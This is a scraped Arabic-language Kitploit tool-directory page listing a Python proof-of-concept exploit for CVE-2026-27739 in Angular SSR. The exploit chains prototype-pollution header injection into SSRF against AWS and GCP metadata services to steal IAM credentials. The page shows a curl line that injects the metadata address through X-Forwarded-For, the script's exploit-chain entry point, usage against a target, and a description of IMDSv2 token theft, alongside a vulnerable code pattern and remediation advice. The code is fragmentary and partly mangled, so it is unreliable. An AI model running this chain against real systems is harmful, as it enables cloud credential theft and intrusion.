Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-27739-POC — Python PoC يستغل CVE-2026-27739 في Angular SSR: حقن الترويسات عبر تلوث النموذج الأولي (prototype pollution) وتسلسل SSRF إلى AWS IMDS/بيانات GCP الوصفية لسرقة بيانات الاعتماد. | Kitploit
أدوات/GitHubGitHub/mr-redoo7/cve-2026-27739-poc
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبجمع المعلوماتأمن الويباختبار الاختراقأمن واجهات برمجة التطبيقات
GitHubmr-redoo7/cve-2026-27739-poc

CVE-2026-27739-POC

Python PoC يستغل CVE-2026-27739 في Angular SSR: حقن الترويسات عبر تلوث النموذج الأولي (prototype pollution) وتسلسل SSRF إلى AWS IMDS/بيانات GCP الوصفية لسرقة بيانات الاعتماد.

عرض المستودع
منذ 5 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

-CVE-2026-27739-poc

curl -H "X-Forwarded-For: http://169.254.169.254/latest/meta-data/" {self.target}

2. حقن الترويسات عبر تلوث النموذج الأولي (CVSS: 7.5)

الوصف: يعالج Angular SSR معاملات استعلام غير آمنة تؤثر على سلسلة النموذج الأولي التأثير: التلاعب بترويسات الطلب، احتمال تسلسل SSRF

المعالجة

  1. إزالة/تعطيل معالجة ترويسة X-Forwarded-* أو وضع قائمة بيضاء للوكلاء المعروفين
  2. تنفيذ تحقق صارم من URL قبل العمليات المعرضة لـ SSRF
  3. استخدام express-validator أو ما شابه لتعقيم الترويسات
  4. تعطيل نقاط نهاية بيانات AWS/GCP الوصفية أو استخدام IMDSv2 مع حد القفزات """ print(report) with open("angular_ssr_exploit_report.txt", "w") as f: f.write(report)

def main(): parser = argparse.ArgumentParser(description="Angular SSR SSRF & Header Injection Exploit") parser.add_argument("target", help="Target Angular SSR application URL") parser.add_argument("--no-ssl-verify", action="store_true", help="Disable SSL verification")

root@kitploit:~
args = parser.parse_args()

exploit = AngularSSRExploit(args.target, ssl_verify=not args.no_ssl_verify)

print(f"[+] Targeting: {args.target}")
print(f"[+] SSL Verify: {'Disabled' if args.no_ssl_verify else 'Enabled'}")

# Execute exploit chain
exploit.test_header_injection()
exploit.exploit_ssrf_chain()
exploit.extract_sensitive_data()
exploit.generate_report()

if name == "main": main() الاستخدام bash

Basic SSRF test

python3 angular_ssr_exploit.py https://target.com

With SSL bypass for self-signed certs

python3 angular_ssr_exploit.py https://target.com --no-ssl-verify كيفية العمل اختبار حقن الترويسات: يرسل حمولات تلوث النموذج الأولي وترويسات forwarded غير الآمنة التي قد يعالجها Angular SSR بشكل غير آمن سلسلة SSRF: يختبر الوصول إلى AWS IMDS وبيانات GCP الوصفية وخدمات localhost عبر X-Forwarded-For/X-Original-URL استخراج رمز IMDSv2: يسلسل SSRF لسرقة رموز بيانات AWS الوصفية ثم بيانات اعتماد IAM التقارير الآلية: ينشئ تقرير اختبار اختراق مُقيَّم بـ CVSS مع إثباتات المفهوم التفاصيل التقنية السبب الجذري: غالبًا ما تمرر تطبيقات Angular Universal SSR ترويسات req.headers مباشرة إلى واجهات برمجة التطبيقات الداخلية دون تعقيم:

javascript

// Vulnerable Angular SSR pattern app.get('*', (req, res) => { const url = req.headers['x-original-url'] || req.originalUrl; // SSRF internalFetch(url, { headers: req.headers }); // Header injection });

تنزيل الأداة